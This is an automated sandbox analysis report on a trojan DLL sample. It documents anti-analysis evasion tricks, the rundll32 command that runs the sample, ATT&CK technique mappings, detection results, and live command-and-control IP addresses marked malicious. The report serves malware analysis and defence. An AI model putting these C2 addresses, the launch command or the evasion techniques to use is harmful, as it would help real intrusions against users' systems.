Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to delay execution (extensive OutputDebugStringW loop)

Show sources

Source: C:\Windows\System32\loaddll32.exe

Section loaded: OutputDebugStringW count: 1174

Source: C:\Windows\System32\loaddll32.exe

Window / User API: threadDelayed 1173

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6F4C0730 GetTokenInformation,GetSystemInfo,GetTokenInformation,

0_2_6F4C0730

Source: Amcache.hve.6.dr	Binary or memory string: VMware
Source: Amcache.hve.6.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: VMware-42 35 34 13 2a 07 0a 9c-ee 7f dd c3 60 c7 b9 af
Source: Amcache.hve.6.dr	Binary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.6.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual disk SCSI Disk Devicehbin
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.6.dr	Binary or memory string: VMware7,1
Source: Amcache.hve.6.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: WerFault.exe, 00000006.00000003.395942096.00000000053E0000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000002.398401488.0000000005323000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000002.398369091.000000000530E000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000002.398560453.00000000053E0000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.6.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.6.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.6.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.13989454.B64.1906190538,BiosReleaseDate:06/19/2019,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1x
Source: Amcache.hve.6.dr	Binary or memory string: VMware, Inc.me
Source: Amcache.hve.6.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000

Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6F4B6D0C GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,

0_2_6F4B6D0C

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6F4C3138 RtlAddVectoredExceptionHandler,

0_2_6F4C3138

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Pv3ZsGsdfS.dll",#1

Jump to behavior

Source: loaddll32.exe, 00000000.00000002.749454473.00000000012A0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.358315172.0000000003020000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.360143274.0000000003020000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000000.00000002.749454473.00000000012A0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.358315172.0000000003020000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.360143274.0000000003020000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: loaddll32.exe, 00000000.00000002.749454473.00000000012A0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.358315172.0000000003020000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.360143274.0000000003020000.00000002.00020000.sdmp	Binary or memory string: &Program Manager
Source: loaddll32.exe, 00000000.00000002.749454473.00000000012A0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.358315172.0000000003020000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.360143274.0000000003020000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\System32\loaddll32.exe

Code function: GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,

0_2_6F4B6D0C

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

0_2_6F4B6D0C

Source: Amcache.hve.6.dr

Binary or memory string: c:\program files\windows defender\msmpeng.exe

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Process Injection12	Virtualization/Sandbox Evasion11	OS Credential Dumping	Query Registry1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection12	LSASS Memory	Security Software Discovery31	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information1	Security Account Manager	Virtualization/Sandbox Evasion11	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Rundll321	NTDS	Process Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	Application Window Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	Account Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	System Owner/User Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	Remote System Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	System Information Discovery13	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Pv3ZsGsdfS.dll	35%	ReversingLabs	Win32.Trojan.BotX

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
3.2.rundll32.exe.930000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
3.0.rundll32.exe.6f4b0000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
3.0.rundll32.exe.6f4b0000.5.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
0.2.loaddll32.exe.1030000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.2.loaddll32.exe.6f4b0000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
3.2.rundll32.exe.6f4b0000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
3.0.rundll32.exe.930000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
3.0.rundll32.exe.930000.3.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://www.baxleystamps.comDVarFileInfo$	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://upx.sf.net	Amcache.hve.6.dr	false		high
http://www.baxleystamps.comDVarFileInfo$	loaddll32.exe, 00000000.00000002.750012504.000000006F4CF000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.358686733.000000006F4CF000.00000002.00020000.sdmp	false	Avira URL Cloud: safe	low

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
185.4.135.27	unknown	Greece	199246	TOPHOSTGR	true
85.10.248.28	unknown	Germany	24940	HETZNER-ASDE	true
80.211.3.13	unknown	Italy	31034	ARUBA-ASNIT	true
144.91.122.102	unknown	Germany	51167	CONTABODE	true

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	544850
Start date:	24.12.2021
Start time:	09:22:41
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 17s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Pv3ZsGsdfS.dll
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	25
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal76.troj.evad.winDLL@6/6@0/4
EGA Information:	Failed
HDC Information:	Successful, ratio: 52.3% (good quality ratio 50.4%) Quality average: 79.2% Quality standard deviation: 27%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Sleeps bigger than 120000ms are automatically reduced to 1000ms Found application associated with file extension: .dll
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 23.54.113.53, 52.182.143.212 Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, onedsblobprdcus15.centralus.cloudapp.azure.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com Not all processes where analyzed, report is missing behavior information VT rate limit hit for: Pv3ZsGsdfS.dll

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
185.4.135.27	Results12232021.xls	Get hash	malicious	Browse
	triage_dropped_file.dll	Get hash	malicious	Browse
	triage_dropped_file.dll	Get hash	malicious	Browse
	triage_dropped_file.dll	Get hash	malicious	Browse
	triage_dropped_file.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware2.10228.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware2.28165.dll	Get hash	malicious	Browse
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.19171.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware2.10228.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware2.28165.dll	Get hash	malicious	Browse
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.19171.dll	Get hash	malicious	Browse
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.21147.dll	Get hash	malicious	Browse
	triage_dropped_file.dll	Get hash	malicious	Browse
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.21147.dll	Get hash	malicious	Browse
	triage_dropped_file.dll	Get hash	malicious	Browse
	triage_dropped_file.dll	Get hash	malicious	Browse
	SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26365.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.11362.dll	Get hash	malicious	Browse
85.10.248.28	Pv3ZsGsdfS.dll	Get hash	malicious	Browse
	Results12232021.xls	Get hash	malicious	Browse
	triage_dropped_file.dll	Get hash	malicious	Browse
	triage_dropped_file.dll	Get hash	malicious	Browse
	triage_dropped_file.dll	Get hash	malicious	Browse
	triage_dropped_file.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware2.10228.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware2.28165.dll	Get hash	malicious	Browse
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.19171.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware2.10228.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware2.28165.dll	Get hash	malicious	Browse
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.19171.dll	Get hash	malicious	Browse
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.21147.dll	Get hash	malicious	Browse
	triage_dropped_file.dll	Get hash	malicious	Browse
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.21147.dll	Get hash	malicious	Browse
	triage_dropped_file.dll	Get hash	malicious	Browse
	triage_dropped_file.dll	Get hash	malicious	Browse
	SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26365.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.11362.dll	Get hash	malicious	Browse

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
TOPHOSTGR	Pv3ZsGsdfS.dll	Get hash	malicious	Browse	185.4.135.27
	Results12232021.xls	Get hash	malicious	Browse	185.4.135.27
	triage_dropped_file.dll	Get hash	malicious	Browse	185.4.135.27
	triage_dropped_file.dll	Get hash	malicious	Browse	185.4.135.27
	triage_dropped_file.dll	Get hash	malicious	Browse	185.4.135.27
	triage_dropped_file.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware2.10228.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware2.28165.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.19171.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware2.10228.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware2.28165.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.19171.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.21147.dll	Get hash	malicious	Browse	185.4.135.27
	triage_dropped_file.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.21147.dll	Get hash	malicious	Browse	185.4.135.27
	triage_dropped_file.dll	Get hash	malicious	Browse	185.4.135.27
	triage_dropped_file.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.26365.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.11362.dll	Get hash	malicious	Browse	185.4.135.27
HETZNER-ASDE	Pv3ZsGsdfS.dll	Get hash	malicious	Browse	85.10.248.28
	arm-20211224-0726	Get hash	malicious	Browse	188.40.179.187
	u3pwH2rdhh.dll	Get hash	malicious	Browse	178.63.25.185
	sD38AZFcDx.dll	Get hash	malicious	Browse	178.63.25.185
	B0163915087099500.xls	Get hash	malicious	Browse	178.63.25.185
	9zTQue8p66	Get hash	malicious	Browse	95.217.252.209
	u3pwH2rdhh.dll	Get hash	malicious	Browse	178.63.25.185
	sD38AZFcDx.dll	Get hash	malicious	Browse	178.63.25.185
	iCxt7GTqSx.exe	Get hash	malicious	Browse	116.202.14.219
	S6624380012007761509.xls	Get hash	malicious	Browse	178.63.25.185
	3hHVPfLM8k.xls	Get hash	malicious	Browse	178.63.25.185
	HL6DTimRMC.xls	Get hash	malicious	Browse	178.63.25.185
	jSVSCeiXfz.xls	Get hash	malicious	Browse	178.63.25.185
	FkpslFZF5N.xls	Get hash	malicious	Browse	178.63.25.185
	SecuriteInfo.com.Trojan.MulDropNET.43.22262.exe	Get hash	malicious	Browse	148.251.234.83
	y7U1OWRhCC.xls	Get hash	malicious	Browse	178.63.25.185
	lF6Ej6Qgsa.xls	Get hash	malicious	Browse	178.63.25.185
	QiOR3R3sps.xls	Get hash	malicious	Browse	178.63.25.185
	m4AbQMQFCO	Get hash	malicious	Browse	159.69.251.216
	QrZ46isOwd.xls	Get hash	malicious	Browse	178.63.25.185

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_20f54535b4fc1ad4777e2f126bb0718bcd6544b5_82810a17_1a7fdfcd\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9131746768123783
Encrypted:	false
SSDEEP:	192:64siW0oXG/HBUZMX4jed+O/u7svS274ItWc:DsiQXG/BUZMX4jeL/u7svX4ItWc
MD5:	29579360B22432DFC0550492B810C2AD
SHA1:	8F3695C341FABAE6CB0488C2E19838F3D67CBD61
SHA-256:	448388426C2B1369CC525FC7649B835A8AC698E0612F88C1CDCA61984EDBE6B3
SHA-512:	4292836993B8AA7E138E24E3C1AE025FCA31C0D31BB21A6F8E303ABFB4606FBDDA9AB619F53E47A0C883F2C98FFFD5EC97680E8400CF275A65322D89FCF9DD14
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.4.8.4.0.2.2.9.7.6.4.5.6.6.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.8.4.8.4.0.2.4.1.8.5.8.2.5.9.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.f.c.4.9.9.2.b.-.c.1.4.b.-.4.9.b.5.-.8.f.c.9.-.8.5.c.1.f.2.d.f.e.9.6.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.f.8.7.0.c.a.a.-.5.1.c.6.-.4.d.8.0.-.9.8.0.e.-.e.2.3.c.6.c.8.5.3.6.d.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.f.4.-.0.0.0.1.-.0.0.1.7.-.d.9.3.e.-.5.a.0.0.e.b.f.8.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA8BF.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Fri Dec 24 17:23:51 2021, 0x1205a4 type
Category:	dropped
Size (bytes):	45808
Entropy (8bit):	2.063465092606408
Encrypted:	false
SSDEEP:	192:lga6E0btUK302icO5SkbfC+O679tHT1Q3achcgGg7nET:GXXtUKJiT5LbBj79tHS3ach1
MD5:	6BA962499491EF50D34753FC43E70E78
SHA1:	FCDD29E7C70650CDEF5AAF15D6D1F65A6FB6D2AA
SHA-256:	2BE1C84338A24B862508C72D428D18E0FBE77006CD10C163FF81F8DB9633FFD0
SHA-512:	E810D101F784AE1FE327F359F7ABFBD756E4DE4EF7E842A6103EA4ADE6A9D60088660A46F1A516E304924D731847E6C8B311B62A393C85D89AAB51226FBE1BE9
Malicious:	false
Reputation:	low
Preview:	MDMP....... .......'..a........................................n-..........T.......8...........T...........@................................................................................................U...........B...... .......GenuineIntelW...........T..............a.............................0..=...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB1E8.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8258
Entropy (8bit):	3.694780832129531
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNi6jd67z/6Yau62gmfT6mSkCpr6q89bOGsfC6m:RrlsNic6X6YT62gmfT6mSCOlfW
MD5:	C2C685B0F4C57BF14EC69949014FC9E7
SHA1:	58ED607D8DEC974687FDB441B0957783BF57B567
SHA-256:	DEDB1C1CC0FEE5C433A3F484A0568AA349701325FCB48CB71348FF473B16DE7B
SHA-512:	A72C828DC593DE6CB08DE4E2BCB43FCD43441CCD4B7ADDFD21C75222B43CF28CDCE01178936630BA1FAF29CF1D31C45A1E7EA195FDFE01B34671C00AB2E23D29
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.9.0.0.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB515.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4630
Entropy (8bit):	4.459592349014678
Encrypted:	false
SSDEEP:	48:cvIwSD8zsaJgtWI9u4WSC8Bg8fm8M4JCdsfi2hFD+q8/08KBLc4SrS8d:uITfotxSNDJpiM58scDW8d
MD5:	A06DCD0393D3DE548D82518693742FB5
SHA1:	5BC6EE3EBF65DDFED1D0FFF8EB7BFE783D3805C3
SHA-256:	E7F298466D4C663D368F7DB05BF9F8FF076694B9BED76FFE750D46D37284BB31
SHA-512:	CB76A09686246456CD8CA5CF98CB2906E0D1ABB663474A7A2E4F9B428AB926998F063C68C07D1A5C51381C84FBE914F3A02F188F3BBF7D21F49D35665D1D3FB0
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1311994" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\Windows\appcompat\Programs\Amcache.hve Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1572864
Entropy (8bit):	4.21783413807694
Encrypted:	false
SSDEEP:	12288:8Ci1aMWKiXr/IW87DN0bvHJsjDUhRzu3dKkzF7ZNq9kS+gab7KV+Ss:Vi1aMWKiXrgW87G+37XX
MD5:	D72F427F707F671A84F3C7CC3E4E3041
SHA1:	87173A87D9B1CDE0B1A53029D30AA52223C94363
SHA-256:	191CEA16D005286BDA625C0F12DDCC07C9DF3F7025F9236F11B2858604A1B167
SHA-512:	83FD8E1167696E4EC59C36F3A744AB15D50A8A70245490D8CC7D8494F9E662F906F427416114B5A0055896659FDD638A5C5848868547D2E4A86C5047E6A1F762
Malicious:	false
Reputation:	low
